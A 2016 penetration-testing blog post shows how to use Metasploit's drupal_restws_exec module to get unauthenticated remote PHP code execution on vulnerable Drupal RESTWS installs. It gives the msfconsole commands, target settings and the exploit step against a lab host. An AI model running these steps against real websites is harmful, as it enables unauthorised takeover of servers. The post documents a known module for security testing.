Pages

  • Home
  • Author
skip to main | skip to sidebar

Hacking Articles|Raj Chandel's Blog

RSS Feed

Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution

at 10:52 PM Friday, July 29, 2016


This module exploits a Remote PHP Code Execution vulnerability in Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user. RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 versions are affected by issue. This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.

Exploit Targets
RESTWS 2.x

Requirement
Attacker: kali Linux
Victim PC: drupal

Open Kali terminal type msfconsole



Now type use exploit/unix/webapp/drupal_restws_exec
msf exploit (drupal_restws_exec)>set targeturi /
msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)
msf exploit (drupal_restws_exec)>set rport 80
msf exploit (drupal_restws_exec)>exploit 


Labels: Kali Linux, Penetration Testing

0 comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Labels

  • Batch File tricks (8)
  • crytography (3)
  • CTF (100)
  • Cyber Forensics Tools (56)
  • DLL Hacking (6)
  • footprinting (2)
  • Google Hacking (1)
  • Hacking Tools (12)
  • Kali Linux (370)
  • others (5)
  • Penetration Testing (1313)
  • redteam (9)
  • Stegnography (7)
  • Windows Hacking (6)

Popular Posts

  • 64-bit Linux Assembly and Shellcoding
    Introduction Shellcodes are machine instructions that are used as a payload in the exploitation of a vulnerability. An exploit is a small ...
  • GreatSct - An Application Whitelist Bypass Tool
    While wrting Applocker bypass series , we found a new tool which was especially design for bypassing whitelisting application.  So Idecid...
  • Abusing AD-DACL : Generic ALL Permissions
      In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Director...
  • MSSQL for Pentester: NetExec
    NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetr...
  • Credential Dumping: AD User Comment
    In this article, we shall explore different tools & techniques that help us enumerate Active Directory (AD) users' passwords using w...
  • Credential Dumping: GMSA
    Abusing AD-DACL: ReadGMSAPassword ReadGMSAPassword Attack is a technique where attackers abuse misconfigured Group Managed Service Account...
  • Active Directory Pentesting Using Netexec Tool: A Complete Guide
    Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a...
  • Abusing AD Weak Permission Pre2K Compatibility
    Pre2K (short for "Pre-Windows 2000") Active Directory misconfigurations often stem from overlooked legacy settings in Windows en...
  • Shadow Credentials Attack
    In this post, we explore the exploitation technique known as the Shadow Credentials attack. This attack leverages the mismanagement or explo...
  • Diamond Ticket Attack: Abusing kerberos Trust
    The Diamond Ticket attack represents a sophisticated escalation in Active Directory (AD) exploitation methods, leveraging intricate flaws in...
 

Copyright 2010 Hacking Articles|Raj Chandel's Blog. Theme zBench Bloggerized by Who Got Eliminated for Sports Master

Δ Top